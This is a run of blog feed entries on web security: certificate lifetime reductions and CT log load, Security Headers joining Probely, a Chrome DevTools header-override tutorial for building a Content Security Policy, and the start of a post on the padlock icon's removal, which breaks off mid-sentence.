<!--kg-card-end: markdown--><p></p><p>As you can see, the longer the certificate is valid for, the more logs it has to be written to. Of course, as time went by, the longer certificates simply didn&apos;t exist and the policy became mostly redundant, to be replaced with this.</p><p></p><!--kg-card-begin: markdown--><table>
<thead>
<tr>
<th style="text-align:center">Certificate Lifetime</th>
<th style="text-align:center">Number of SCTs from distinct CT Logs</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align:center">&lt;= 180 days</td>
<td style="text-align:center">2</td>
</tr>
<tr>
<td style="text-align:center">&gt; 180 days</td>
<td style="text-align:center">3</td>
</tr>
</tbody>
</table>
<!--kg-card-end: markdown--><p></p><p>Logging to CT logs creates a burden for the issuing CA and it&apos;s a burden that they&apos;re likely to want to minimise. By introducing these new requirements, both <a href="https://support.apple.com/en-gb/HT205280?ref=scotthelme.co.uk">Apple</a> and <a href="https://github.com/GoogleChrome/CertificateTransparency/blob/master/ct_policy.md?ref=scotthelme.co.uk">Google</a> are giving CAs a benefit to achieve by issuing shorter certificates and this is one of the things that first got me wondering if this was their way of hinting at what was coming next. Drawing the line at 180 days would certainly seem to fit well with our progress on shortening certificates, and this could be a good way to get CAs and subscribers (the people acquiring certificates) used to a 180-day cadence. Then, Google gave another hint.</p><p></p><h4 id="chrome-root-program">Chrome Root Program</h4><p>Much like Mozilla run their own <a href="https://wiki.mozilla.org/CA?ref=scotthelme.co.uk">Root Authority Program</a> for their products like Firefox, so too do <a href="https://blog.chromium.org/2022/09/announcing-launch-of-chrome-root-program.html?ref=scotthelme.co.uk">Google</a> with Chrome and other major players in the industry with their own Root Authority Programs for their own clients like <a href="https://learn.microsoft.com/en-us/security/trusted-root/program-requirements?ref=scotthelme.co.uk">Microsoft</a> and <a href="https://www.apple.com/certificateauthority/ca_program.html?ref=scotthelme.co.uk">Apple</a>. The Chrome Root Program, sadly not named the Chrome Root Authority Program (CRAP) as would it would otherwise be, published <a href="https://www.chromium.org/Home/chromium-security/root-ca-policy/moving-forward-together/?ref=scotthelme.co.uk">Moving Forward, Together</a>, a post worth reading for many reasons, but I&apos;ll focus on just one of them here. </p><p></p><blockquote>a reduction of TLS server authentication subscriber certificate maximum validity from 398 days to 90 days</blockquote><p></p><p><em>90 days?!</em> Before we get too excited, it&apos;s worth noting that the section I quoted that text from begins with:</p><p></p><blockquote>In a future policy update or CA/Browser Forum Ballot Proposal, we intend to introduce</blockquote><p></p><p>This is Chrome laying the groundwork for the next change in certificate validity periods, but it doesn&apos;t exclude another step between where we are now and when 90 days becomes the norm. </p><p></p><h4 id="whats-the-next-reduction">What&apos;s the next reduction?</h4><p>Personally, I&apos;m torn between what&apos;s the right option for the next change, and that might come as a surprise to some given my views and the blog posts I&apos;ve published over the years!</p><p>On one hand, the answer is both easy and obvious, it should be 90-day certificates! On the other hand, trying to be a little more pragmatic, one has to wonder if the industry is quite ready for 90-day certificates...</p><p>My biggest hesitation is the low number of CAs that support ACME, the protocol that allows easy and standardised automatic renewal of certificates. I&apos;ve detailed the few that do offer <a href="https://scotthelme.co.uk/tag/free-acme-ca/?ref=scotthelme.co.uk">free certificates via ACME</a>, but at this point, I don&apos;t understand why all CAs don&apos;t support ACME, including the commercial ones.</p><p>If we&apos;re going to 90-day certificates, the process of renewal simply must be automated. There&apos;s no way that it would be reasonable for anyone to consider renewing those certificates manually because they should be renewed every 30 days, or maybe 60 days at the absolute most. Once I think that, though, I then wonder how 180 days would make any difference... Would people renew those certificates manually? Is that still a reasonable expectation or should 180-day certificates also be renewed in an automated fashion? If that&apos;s the deciding factor then we should just go to 90-day certificates as everyone will need to automate anyway.</p><p>Maybe another way to look at this is to look at the reductions in certificate validity over time, and then plot both 90-day or 180-day certificates as the next change. If we do that, you can see that one of these follows the trend much more nicely and seems like the more logical choice. The following graphs show the certificate validity limit in months on the Y axis and the date the change came into effect on the X axis. The graphs assume the next change will be introduced in Jan 2024.</p><p></p><p>Here is the graph with 180-day certificates.</p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/07/image.png" class="kg-image" alt="Cryptographic Agility Part 1: Server Certificates" loading="lazy" width="1848" height="1050" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/07/image.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/07/image.png 1000w, https://scotthelme.co.uk/content/images/size/w1600/2023/07/image.png 1600w, https://scotthelme.co.uk/content/images/2023/07/image.png 1848w" sizes="(min-width: 720px) 720px"></figure><p></p><p>Here is the graph with 90-day certificates.</p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/07/image-1.png" class="kg-image" alt="Cryptographic Agility Part 1: Server Certificates" loading="lazy" width="1848" height="1050" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/07/image-1.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/07/image-1.png 1000w, https://scotthelme.co.uk/content/images/size/w1600/2023/07/image-1.png 1600w, https://scotthelme.co.uk/content/images/2023/07/image-1.png 1848w" sizes="(min-width: 720px) 720px"></figure><p></p><p>You can see that the trend line is following much better when the next change is to 90 days and the 180 day change is really flattening the bottom of that slope. On top of that, you can see that 90 day or 180 day are both, quite clearly, a reduction in our rate of progress over time and that&apos;s assuming the change comes in Jan 2024! If we push this out further than that, which is almost a certainty at this point, things only start to look worse.</p><p></p><h4 id="other-considerations">Other Considerations</h4><p>The most obvious consideration for this change is the impact on subscribers, those using the certificates for HTTPS. It means more frequent renewals of certificates, more frequent deployments of certificates, and possibly implementing a whole new set of technologies and processes if you&apos;re doing manual renewal at present. There are some other considerations too though and I thought I&apos;d list them here briefly.</p><p></p><h6 id="can-cas-handle-the-load">Can CAs handle the load?</h6><p>Every certificate that is issued requires a CA to go through the issuance process and that requires the appropriate amount of infrastructure. If we reduce certificate validity periods, then CAs will have to complete that process more frequently, even without increasing their number of customers. For a CA issuing only 10,000,000 certificates per year, they&apos;d be doing ~27,400 issuances per day at present assuming 1-year certificates. If we go to 90-day certificates, that same CA would now need to handle ~333,300 issuances per day, quite an increase! </p><p>Considerations on this load increase would need to made for their HSM capabilities to do the signing operation, database activity, storage for logs, bandwidth both internally and externally, along with much more. There aren&apos;t many orgs out there that have the ability to do &gt;10x on their production load on short notice! You can read this <a href="https://letsencrypt.org/2021/02/10/200m-certs-24hrs.html?ref=scotthelme.co.uk">article from</a> Let&apos;s Encrypt on their concerns with having to reissue all of the non-expired certificates that they have, something which is a slightly different concern, but mirrors all of the same performance and infrastructure worries. If you look at the <a href="https://letsencrypt.org/stats/?ref=scotthelme.co.uk">Let&apos;s Encrypt stats</a>, however, they&apos;re comfortably issuing &gt;3,000,000 certificates <em>per day</em> without any problems so it can be done, the CAs might just need to make some improvements.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/07/image-2.png" class="kg-image" alt="Cryptographic Agility Part 1: Server Certificates" loading="lazy" width="901" height="460" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/07/image-2.png 600w, https://scotthelme.co.uk/content/images/2023/07/image-2.png 901w" sizes="(min-width: 720px) 720px"></figure><p></p><h6 id="can-ct-logs-handle-the-load">Can CT Logs handle the load?</h6><p>I briefly mentioned <a href="https://scotthelme.co.uk/certificate-transparency-an-introduction/?ref=scotthelme.co.uk">Certificate Transparency</a> at the start of this blog post and if you&apos;re unfamiliar with how it works, it requires that CAs log all certificates they issue to a minimum of two independently operated CT Logs. A lower lifespan on certificates of course means that more entries will need to be made into the CT Logs because more issuance events are taking place, and thus an increase in the associated costs of operating the log. This will require more bandwidth, more computational power and more storage, at a minimum, from all log operators! We&apos;ve already dealt with some quite significant increases in the load place on CT logs and Temporal Sharding, as <a href="https://venafi.com/blog/how-temporal-sharding-helps-ease-challenge-growing-log-scale/?ref=scotthelme.co.uk">explained here by Venafi</a>, should be good enough to keep the sheer storage requirements at bay, but it doesn&apos;t solve the other concerns like bandwidth and compute power. Here are some details on the <a href="https://letsencrypt.org/2019/11/20/how-le-runs-ct-logs.html?ref=scotthelme.co.uk">Let&apos;s Encrypt CT Log</a> which are almost 4 years old and based on 1,000,000 certificates being issued per day, so imagine where we are now as Let&apos;s Encrypt are comfortably doing 3,000,000 certificates per day!</p><blockquote>We use 2x db.r5.4xlarge instances for RDS for each CT log. Each of these instances contains 8 CPU cores and 128GB of RAM.</blockquote><blockquote>We use 4x c5.2xlarge EC2 instances for the worker node pool for each CT log. Each of these instances contains 8 CPU cores and 16GB of RAM.</blockquote><blockquote>A back of the napkin storage estimation is 1TB per 100 million entries. We expect to need to store 1 billion certificates and precertificates per annual temporal shard, for which we would need 10TB ... We decided to create a 12TB storage block per log (10TB plus some breathing room)</blockquote><p></p><p>With a global issuance rate of ~250,000 new certificates per hour, a rate that is only growing, CT Log Operators will certainly have some interesting times ahead!</p><p></p><h6 id="90-day-certificates">90-day certificates</h6><p>I&apos;ve long pointed out the need for shorter certificates and once the process of issuance and deployment is automated, the validity period of a certificate no longer matters. All of the certificates that I use, both internally and externally, are automatically renewed and deployed, so I could renew them every 7 days if I really wanted to and apart from changing the frequency of the renewal task, I wouldn&apos;t have to lift a single finger. The big push here isn&apos;t really about the validity period of a certificate, it&apos;s a push towards automation, and once we get that widespread, we&apos;ll be in a much better place!</p><p></p><p>If you enjoyed this blog post and would like to dive deeper into the World of TLS and PKI, why not join me on our <a href="https://www.feistyduck.com/training/practical-tls-and-pki?ref=scotthelme.co.uk">Practical TLS and PKI workshop</a>!</p><p></p><figure class="kg-card kg-image-card"><a href="https://www.feistyduck.com/training/practical-tls-and-pki?ref=scotthelme.co.uk"><img src="https://scotthelme.co.uk/content/images/2023/07/image-3.png" class="kg-image" alt="Cryptographic Agility Part 1: Server Certificates" loading="lazy" width="1012" height="466" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/07/image-3.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/07/image-3.png 1000w, https://scotthelme.co.uk/content/images/2023/07/image-3.png 1012w" sizes="(min-width: 720px) 720px"></a></figure><p></p>]]></content:encoded></item><item><title><![CDATA[Security Headers is joining Probely! 🎉]]></title><description><![CDATA[<p>I&apos;m super excited to be making this announcement for a whole bunch of reasons that I&apos;ll go into in detail below, but, the headline is that Security Headers will be joining <a href="https://probely.com/?ref=scotthelme.co.uk">Probely</a>!</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/05/security-headers-full.svg" class="kg-image" alt loading="lazy" width="300" height="42"></figure><p></p><h4 id="the-announcement">The Announcement</h4><p>For anyone who uses the site or the API, this won&apos;</p>]]></description><link>https://scotthelme.co.uk/security-headers-is-joining-probely/</link><guid isPermaLink="false">64622ac3f0316400016ebc94</guid><category><![CDATA[Security Headers]]></category><category><![CDATA[Probely]]></category><dc:creator><![CDATA[Scott Helme]]></dc:creator><pubDate>Wed, 07 Jun 2023 14:10:59 GMT</pubDate><media:content url="https://scotthelme.co.uk/content/images/2023/06/IMG_9452.png" medium="image"/><content:encoded><![CDATA[<img src="https://scotthelme.co.uk/content/images/2023/06/IMG_9452.png" alt="Security Headers is joining Probely! &#x1F389;"><p>I&apos;m super excited to be making this announcement for a whole bunch of reasons that I&apos;ll go into in detail below, but, the headline is that Security Headers will be joining <a href="https://probely.com/?ref=scotthelme.co.uk">Probely</a>!</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/05/security-headers-full.svg" class="kg-image" alt="Security Headers is joining Probely! &#x1F389;" loading="lazy" width="300" height="42"></figure><p></p><h4 id="the-announcement">The Announcement</h4><p>For anyone who uses the site or the API, this won&apos;t change anything, but for me, this will bring positive changes that I wanted to share with everyone. </p><p><a href="https://probely.com/?ref=scotthelme.co.uk">Probely</a> have been sponsoring Security Headers since Sep 2020(!) and are our longest standing sponsor. The relationship has worked so well because we&apos;re aligned in a few different ways. Getting a DAST scan from Probely is a logical next step after a free Security Headers scan, we&apos;re both focused on providing value within the community, they&apos;re a great bunch of technical people and I get along well with everyone I&apos;ve met there. </p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/05/probely.svg" class="kg-image" alt="Security Headers is joining Probely! &#x1F389;" loading="lazy" width="150" height="32"></figure><p></p><p>If you look back at the history of sponsors on Security Headers, I&apos;ve always taken care to ensure that our sponsors are aligned with what we do, and it&apos;s never been the case that you can simply pay to be a sponsor. There had to be more to it than that, and that&apos;s why there were periods with no sponsor at all and I funded the project myself. To now take things to the next level, we&apos;ll be bringing Security Headers and Probely a little closer together!</p><p></p><h4 id="why-the-change">Why the change?</h4><p>In may ways, I can summarise this decision with &quot;it felt right&quot;. Security Headers wasn&apos;t for sale and I wasn&apos;t looking to sell it, but as we started to explore how we could work more closely together and the great things we could do, it naturally became the obvious path forward for us to join forces.</p><p>Probely will now take care of Security Headers and I will continue to provide the same input and direction for the site. Now though, instead of it being me doing this alone, I&apos;ll have a great team of people around me to work with, which will be a refreshing experience! Nothing will be taken away from Security Headers and scans will still be free, but if anything happens to me, it can and will continue!</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/05/image-7.png" class="kg-image" alt="Security Headers is joining Probely! &#x1F389;" loading="lazy" width="1286" height="768" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/05/image-7.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/05/image-7.png 1000w, https://scotthelme.co.uk/content/images/2023/05/image-7.png 1286w" sizes="(min-width: 720px) 720px"></figure><p></p><p>Alongside continuing to maintain Security Headers, I&apos;ll also be joining Probely as a Strategic Advisor to contribute in a variety of ways to their product offering too. This is another element of working alongside great people that will be awesome and whilst only a small time commitment, having a team of people sharing the same passion around me is an exciting prospect.</p><p>All-in-all, this change wouldn&apos;t be visible from the outside but I wanted to be transparent and share this great news with everyone out there. From here, things will only continue to get better!</p><p></p>]]></content:encoded></item><item><title><![CDATA[Overriding HTTP Response Headers in Chrome Dev Tools]]></title><description><![CDATA[<p>There&apos;s a new feature in Chrome Dev Tools that&apos;s going to make it easier than ever to get started with Security Headers like Content Security Policy! Let&apos;s take a look at how to override HTTP Response Headers and build a basic CSP in just</p>]]></description><link>https://scotthelme.co.uk/overriding-http-response-headers-in-chrome-dev-tools/</link><guid isPermaLink="false">644a8eeff05070003ddeccaa</guid><category><![CDATA[CSP]]></category><category><![CDATA[Report URI]]></category><category><![CDATA[chrome]]></category><category><![CDATA[Security Headers]]></category><dc:creator><![CDATA[Scott Helme]]></dc:creator><pubDate>Thu, 04 May 2023 13:37:01 GMT</pubDate><media:content url="https://scotthelme.co.uk/content/images/2023/04/header-overrides.png" medium="image"/><content:encoded><![CDATA[<img src="https://scotthelme.co.uk/content/images/2023/04/header-overrides.png" alt="Overriding HTTP Response Headers in Chrome Dev Tools"><p>There&apos;s a new feature in Chrome Dev Tools that&apos;s going to make it easier than ever to get started with Security Headers like Content Security Policy! Let&apos;s take a look at how to override HTTP Response Headers and build a basic CSP in just a few minutes.</p><p></p><h4 id="override-http-response-headers">Override HTTP Response Headers</h4><p>The feature that I&apos;m going to be showing here is available in Chrome 113, which at the time of writing I was testing in Beta, but is now available in stable so check if you have an update available. Your Chrome version needs to be &gt;= 113 for the feature I&apos;m showing. </p><p></p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://scotthelme.co.uk/content/images/2023/04/image-4.png" class="kg-image" alt="Overriding HTTP Response Headers in Chrome Dev Tools" loading="lazy" width="964" height="542" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/04/image-4.png 600w, https://scotthelme.co.uk/content/images/2023/04/image-4.png 964w" sizes="(min-width: 720px) 720px"><figcaption><em><a href="https://developer.chrome.com/blog/new-in-devtools-113/?ref=scotthelme.co.uk">source</a></em></figcaption></figure><p></p><p>One of the great things about this new functionality in Dev Tools is that not only can you override the value of HTTP Response Headers that exist, you can also set entirely new HTTP Response Headers that don&apos;t exist to test out what effect they will have. This is going to make testing certain Security Headers even easier, like <a href="https://scotthelme.co.uk/goodbye-feature-policy-and-hello-permissions-policy/?ref=scotthelme.co.uk">Permissions Policy</a>, <a href="https://scotthelme.co.uk/coop-and-coep/?ref=scotthelme.co.uk">Cross Origin Embedder Policy and Cross Origin Opener Policy</a> and of course, <a href="https://scotthelme.co.uk/content-security-policy-an-introduction/?ref=scotthelme.co.uk">Content Security Policy</a>. All of these headers do have safe modes for testing, where you can deploy these headers and they won&apos;t take any blocking action, and instead provide feedback on what blocking action they would cause, if any. That approach is great, and as I say it makes testing them totally safe, but you will still have to deploy them somehow. This may only be a single line of server config, application code or a tweak in your CDN settings somewhere, but it&apos;s a step you need to take nonetheless. Now, you can do really extensive testing of these Security Headers (and more!) from the comfort of your own browser.</p><p></p><h4 id="creating-an-override">Creating an override</h4><p>For the purposes of this demo, I&apos;m going to be using my own personal site to deploy a Content Security Policy header so I can do some easy testing. Open the site you want to work with, open Dev Tools and head to the Network tab. Once there, find the network request for the page load, click it to open the details, click Headers, and scroll to the Response Headers section. Here, you will see the new &apos;Header overrides&apos; option. </p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/05/image-6.png" class="kg-image" alt="Overriding HTTP Response Headers in Chrome Dev Tools" loading="lazy" width="1620" height="978" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/05/image-6.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/05/image-6.png 1000w, https://scotthelme.co.uk/content/images/size/w1600/2023/05/image-6.png 1600w, https://scotthelme.co.uk/content/images/2023/05/image-6.png 1620w" sizes="(min-width: 720px) 720px"></figure><p></p><p>That will prompt you to create an overrides file, so look for the banner near the top of the browser to give Chrome a location and permission to store the file. Once done, it will take you to the Sources tab where you can view your overrides file and you can edit it to specify your override rules.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/04/image-6.png" class="kg-image" alt="Overriding HTTP Response Headers in Chrome Dev Tools" loading="lazy" width="1620" height="978" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/04/image-6.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/04/image-6.png 1000w, https://scotthelme.co.uk/content/images/size/w1600/2023/04/image-6.png 1600w, https://scotthelme.co.uk/content/images/2023/04/image-6.png 1620w" sizes="(min-width: 720px) 720px"></figure><p></p><p>I&apos;m going to &apos;Add override rule&apos; and then add my basic CSP header which would typically make a real mess of the page!</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/04/image-7.png" class="kg-image" alt="Overriding HTTP Response Headers in Chrome Dev Tools" loading="lazy" width="1620" height="978" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/04/image-7.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/04/image-7.png 1000w, https://scotthelme.co.uk/content/images/size/w1600/2023/04/image-7.png 1600w, https://scotthelme.co.uk/content/images/2023/04/image-7.png 1620w" sizes="(min-width: 720px) 720px"></figure><p></p><p>We can now refresh the page and the override rule be active, resulting in, as you&apos;d expect, almost everything on the page being blocked with the associated errors showing up in the Console.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/04/image-8.png" class="kg-image" alt="Overriding HTTP Response Headers in Chrome Dev Tools" loading="lazy" width="1620" height="978" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/04/image-8.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/04/image-8.png 1000w, https://scotthelme.co.uk/content/images/size/w1600/2023/04/image-8.png 1600w, https://scotthelme.co.uk/content/images/2023/04/image-8.png 1620w" sizes="(min-width: 720px) 720px"></figure><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/04/image-9.png" class="kg-image" alt="Overriding HTTP Response Headers in Chrome Dev Tools" loading="lazy" width="1620" height="978" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/04/image-9.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/04/image-9.png 1000w, https://scotthelme.co.uk/content/images/size/w1600/2023/04/image-9.png 1600w, https://scotthelme.co.uk/content/images/2023/04/image-9.png 1620w" sizes="(min-width: 720px) 720px"></figure><p></p><p>Because the override rule is only being enforced locally on my client, this is a really safe way of seeing exactly what would happen given a particular configuration of your CSP or other Security Headers. What&apos;s even better is that the browser will behave exactly as it would behave if that header came from the server, which means all of the features of CSP are available to you, including sending reports!</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/04/report-uri-full-2.svg" class="kg-image" alt="Overriding HTTP Response Headers in Chrome Dev Tools" loading="lazy" width="300" height="58"></figure><p></p><h4 id="creating-a-csp-the-easy-way">Creating a CSP the easy way</h4><p>It was 5 years ago now when we introduced the <a href="https://scotthelme.co.uk/report-uri-csp-wizard/?ref=scotthelme.co.uk">CSP Wizard</a> on Report URI. The CSP Wizard takes your CSP reports and allows you to build a policy by looking at the items that are present on your site. Looking at the <a href="https://docs.report-uri.com/setup/wizard/?ref=scotthelme.co.uk">documentation</a>, you can see that a simple CSP-Report-Only header is required.</p><p></p><pre><code>Content-Security-Policy-Report-Only: default-src &apos;none&apos;; form-action &apos;none&apos;; frame-ancestors &apos;none&apos;; report-uri https://{subdomain}.report-uri.com/r/d/csp/wizard
</code></pre><p></p><p>This policy won&apos;t block anything and break the page, because it&apos;s in Report-Only mode, but it will cause a report to be sent for every item on the page. That information, the reporting of every asset on the page, is what allows you to quickly and easily audit all of resources loading across your site. Typically, this header would need to be deployed into production, but now, we can deploy it locally and get a huge amount of feedback in just a few seconds. </p><p>In the <a href="https://report-uri.com/account/policies/csp/?ref=scotthelme.co.uk">My Policies</a> section of Report URI, I&apos;m going to create a new policy called &quot;Scott Demo&quot; and enable the Wizard.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/04/image-10.png" class="kg-image" alt="Overriding HTTP Response Headers in Chrome Dev Tools" loading="lazy" width="1081" height="364" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/04/image-10.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/04/image-10.png 1000w, https://scotthelme.co.uk/content/images/2023/04/image-10.png 1081w" sizes="(min-width: 720px) 720px"></figure><p></p><p>From the <a href="https://report-uri.com/account/setup/?ref=scotthelme.co.uk">Setup</a> page I can get my unique reporting address that will need to be used in my CSPRO header, and then I&apos;m good to update the header override with the new values.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/04/image-11.png" class="kg-image" alt="Overriding HTTP Response Headers in Chrome Dev Tools" loading="lazy" width="1620" height="978" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/04/image-11.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/04/image-11.png 1000w, https://scotthelme.co.uk/content/images/size/w1600/2023/04/image-11.png 1600w, https://scotthelme.co.uk/content/images/2023/04/image-11.png 1620w" sizes="(min-width: 720px) 720px"></figure><p></p><p>As you can see, the page is back to normal now because the CSPRO header doesn&apos;t cause anything to be blocked, but the console is still indicating all of those CSP errors. </p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/04/image-12.png" class="kg-image" alt="Overriding HTTP Response Headers in Chrome Dev Tools" loading="lazy" width="1620" height="978" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/04/image-12.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/04/image-12.png 1000w, https://scotthelme.co.uk/content/images/size/w1600/2023/04/image-12.png 1600w, https://scotthelme.co.uk/content/images/2023/04/image-12.png 1620w" sizes="(min-width: 720px) 720px"></figure><p></p><p>The crucial part here is the CSP reports have been sent as the <code>report-uri</code> directive was set, and you can see the reports in the Network tab.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/04/image-13.png" class="kg-image" alt="Overriding HTTP Response Headers in Chrome Dev Tools" loading="lazy" width="1620" height="978" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/04/image-13.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/04/image-13.png 1000w, https://scotthelme.co.uk/content/images/size/w1600/2023/04/image-13.png 1600w, https://scotthelme.co.uk/content/images/2023/04/image-13.png 1620w" sizes="(min-width: 720px) 720px"></figure><p></p><p>All I have to do now is head over to the <a href="https://report-uri.com/account/wizard/csp/?ref=scotthelme.co.uk">CSP Wizard</a> page and I can see all of the new items that have been detected and need my attention. From here, it&apos;s a simple case of deciding if each item is supposed to be there, in which case I can select the item and add it to my CSP, or, if it&apos;s not supposed to be there, I select it and block it, meaning it won&apos;t be added to my CSP.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/04/image-14.png" class="kg-image" alt="Overriding HTTP Response Headers in Chrome Dev Tools" loading="lazy" width="1069" height="955" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/04/image-14.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/04/image-14.png 1000w, https://scotthelme.co.uk/content/images/2023/04/image-14.png 1069w" sizes="(min-width: 720px) 720px"></figure><p></p><p>You&apos;ll need to click around a few pages on your site to make sure you&apos;re exercising all of the functionality, and by just skipping around a few pages, I managed to get a few more items reported. For example, my Disqus comment system only loads on blog posts and doesn&apos;t load on the homepage, for obvious reasons. I also only have YouTube videos embedded in certain blog posts so only those pages would report them. This is why we generally advise to deploy the CSP Wizard in production for a day or so, but in just a few seconds, I&apos;ve gathered a heap of feedback about the resources on my site.</p><p>After approving the appropriate entries in the CSP Wizard, I now have the following in My Policies:</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/04/image-15.png" class="kg-image" alt="Overriding HTTP Response Headers in Chrome Dev Tools" loading="lazy" width="1078" height="433" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/04/image-15.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/04/image-15.png 1000w, https://scotthelme.co.uk/content/images/2023/04/image-15.png 1078w" sizes="(min-width: 720px) 720px"></figure><p></p><p>This is already a good chunk of the way towards generating a viable policy to use on my site. What I&apos;d do now is replace the policy in the header override rule with the one above, so those items are no longer being reported, reducing the volume of reports being sent, and continue browsing around. Eventually, you would be best deploying this onto the live site, but the majority of the work has now been done in just a few minutes locally.</p><p>I think these header overrides are going to be really useful for people to play around with and test features like CSP without having to get their hands too dirty to start with. If you want to give the CSP Wizard a go, or try out any of our many features, you can sign up for a 30-day free trial over at <a href="https://report-uri.com/?ref=scotthelme.co.uk">Report URI</a> to get started!</p><p></p>]]></content:encoded></item><item><title><![CDATA[Goodbye, old friend 👋🔒]]></title><description><![CDATA[<p>It&apos;s been a really long time coming, but, the end is finally here for the padlock icon in the address bar! &#x1F512;&#x1F6AB;</p><p></p><h4 id="a-long-road">A Long Road</h4><p>Wow, where do I start?! Whilst the dawn of the encrypted Web was in 1994, with the release of SSLv2.0, the</p>]]></description><link>https://scotthelme.co.uk/goodbye-old-friend/</link><guid isPermaLink="false">645175e210d19d003d7e008b</guid><category><![CDATA[HTTPS]]></category><category><![CDATA[chrome]]></category><dc:creator><![CDATA[Scott Helme]]></dc:creator><pubDate>Wed, 03 May 2023 09:37:39 GMT</pubDate><media:content url="https://scotthelme.co.uk/content/images/2023/05/background-new-https-icon.png" medium="image"/><content:encoded><![CDATA[<img src="https://scotthelme.co.uk/content/images/2023/05/background-new-https-icon.png" alt="Goodbye, old friend &#x1F44B;&#x1F512;"><p>It&apos;s been a really long time coming, but, the end is finally here for the padlock icon in the address bar! &#x1F512;&#x1F6AB;</p><p></p><h4 id="a-long-road">A Long Road</h4><p>Wow, where do I start?! Whilst the dawn of the encrypted Web was in 1994, with the release of SSLv2.0, the real transition to an encrypted Web didn&apos;t start until ~2014, a little after the Snowden revelations. If we look at the % of page loads that have used HTTPS on the Web, you can see when we started putting effort into the problem.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/05/image-1.png" class="kg-image" alt="Goodbye, old friend &#x1F44B;&#x1F512;" loading="lazy" width="1278" height="717" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/05/image-1.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/05/image-1.png 1000w, https://scotthelme.co.uk/content/images/2023/05/image-1.png 1278w" sizes="(min-width: 720px) 720px"></figure><p></p><p>Note that we don&apos;t really have any reliable data prior to 2013 because nobody was paying attention, so that section of the graph is my best estimation, but from 2013 onwards we have multiple, reliable sources of data and the graph is accurate. </p><p></p><p>Along the way to an encrypted Web we&apos;ve come across <a href="https://scotthelme.co.uk/https-anti-vaxxers/?ref=scotthelme.co.uk">HTTPS Anti-Vaxxers</a>, <a href="https://scotthelme.co.uk/certificate-lifetime-capped-to-1-year-from-sep-2020/?ref=scotthelme.co.uk">shorter certificates</a>, <a href="https://scotthelme.co.uk/chrome-to-the-future/?ref=scotthelme.co.uk">warnings on HTTP sites</a>, <a href="https://scotthelme.co.uk/gone-for-ever/?ref=scotthelme.co.uk">the removal of the EV UI</a>, and countless other <a href="https://scotthelme.co.uk/tag/https/?ref=scotthelme.co.uk">major changes</a> in the industry that I&apos;ve documented well here on my blog. But now, the pi&#xE8;ce de r&#xE9;sistance, the padlock indicator, is to be retired after almost 30 years of service. To be clear, this was always inevitable. We&apos;ve seen the removal of the word &apos;Secure&apos;, removal of the green colour, removal of &apos;https://&apos; in the address bar and now, the removal of the padlock icon. The writing has been on the wall for a long time and there are now a lot of people out there who owe me $1 for losing our bet that 2023 would be the year the padlock was removed!</p><p></p><h4 id="an-update-on-the-lock-icon">An Update on the Lock Icon</h4><p>The blog post from Chromium, <a href="https://blog.chromium.org/2023/05/an-update-on-lock-icon.html?ref=scotthelme.co.uk">An Update on the Lock Icon</a>, is short and sweet. It details everything that you&apos;d expect from them, including research and links to sources for data, something that other industry players never 